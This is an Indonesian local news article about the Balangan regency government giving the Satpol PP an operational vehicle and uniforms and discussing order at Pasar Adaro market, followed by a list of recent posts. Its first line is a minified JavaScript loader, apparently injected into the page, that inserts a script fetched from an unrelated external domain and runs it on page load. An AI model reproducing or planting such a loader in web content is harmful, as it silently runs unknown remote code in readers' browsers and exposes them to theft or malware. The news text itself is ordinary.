(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Pemkab Balangan Serahkan Satu Unit Mobil Operasional Satpol PP


KANALKALIMANTAN.COM,BALANGAN- Pemerintah Kabupaten Balangan serahkan satu unit mobil penunjang operasional Satuan Polisi Pamong Praja (Satpol PP) Kabupaten Balangan, di Halaman Kantor Bupati Balangan, Paringin Selatan, Senin (09/01/2023).

Mobil operasional diserahkan langsung Bupati Balangan, H Abdul Hadi kepada Kepala Satpol PP Balangan Noor Aspariah, disaksikan sejumlah pejabat di Lingkungan Pemkab Balangan dan jajaran Satpol PP Balangan.

Bupati Balangan, Abdul Hadi, menyampaikan dengan adanya mobil operasional ini dapat menunjang kelancaran penegakan perundang-undang daerah dalam mewujudkan ketentraman dan ketertiban di masyarakat.

“Penambahan mobil operasional ini, semoga dapat menunjang kelancaran kinerja Satpol PP Balangan untuk melaksanakan penegakan peraturan perundang-undang daerah dan tidak ada kendala lagi dalam memobilisasi anggotanya,” ujarnya.

 

Baca juga: Tak Pandai Merawat, Begini Polah Segelintir Pengunjung JPO Banjarbaru 2

Untuk kegiatan penertiban pasar khususnya di Pasar Adaro, Abdul Hadi juga meminta jajaran Satpol PP Balangan dapat mengawasi ketertiban para pedagang dalam berjualan, sehingga suasana dan pemandangan di pasar tersebut lebih tertib dan lebih baik lagi penataannya.

“Kami meminta kepada Satpol PP, supaya pedagang-pedagang yang berada diluar Pasar Adaro untuk ditertibkan masuk kedalam pasar, agar pemandangannya lebih baik, sehingga kita harapkan ada pemerataan pendapatan para pedagang,” harapnya.

Terkait penertiban pasar ini, Kepala Satpol PP Balangan, Noor Aspariah,juga menyampaikan untuk menjaga ketertiban dan keamanan di setiap pasar, akan ditugaskan sebanyak lima orang anggota per kecamatan.

“Rencana dari Satpol PP Balangan sebanyak lima orang per kecamatan untuk menghandle penataan pedagang kaki lima, bekerjasama juga dengan Kasi Trantib untuk menjaga keamanan dan ketertiban di pasar yang mulai dilaksanakan bulan Februari nanti,”tambahnya.

Dalam kegiatan ini juga, Bupati Balangan, Abdul Hadi juga secara simbolis menyerahkan seragam lengkap Satpol PP yang diterima oleh perwakilan anggota.(www.kanalkalimantan.com/MC Balangan)

Reporter: KK
Editor: KK


Al Ghifari

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

3 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

4 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

15 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

15 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

15 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

15 jam ago

This website uses cookies.